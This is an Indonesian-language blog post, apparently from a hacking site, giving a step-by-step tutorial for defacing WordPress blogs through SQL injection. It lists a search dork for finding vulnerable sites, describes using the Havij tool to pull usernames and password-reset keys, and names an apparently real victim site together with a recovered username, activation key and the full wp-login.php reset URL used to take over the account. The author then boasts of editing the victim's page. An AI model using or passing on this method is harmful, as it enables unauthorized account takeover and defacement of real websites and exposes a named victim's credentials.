| Filename | Tutorial Hack Wordpress dengan Sql injection with Havij |
| Permission | rw-r--r-- |
| Author | Axveez |
| Date and Time | 02:24 |
| Label | |
| Action |
Hack
WordPress (SQL Injection + Reset Password) merupakan salah satu cara
yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena
caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung
aja kita mulai
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..
- Kompie terhubung internet
- Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
- dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
- Kesabaran dalam mencari target
- Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu caricolumn user_login dan user_activation_key
heheh…dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”
jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
buseeeet hasilnya kelam banget dah…sory ya min
0 comments:
Post a Comment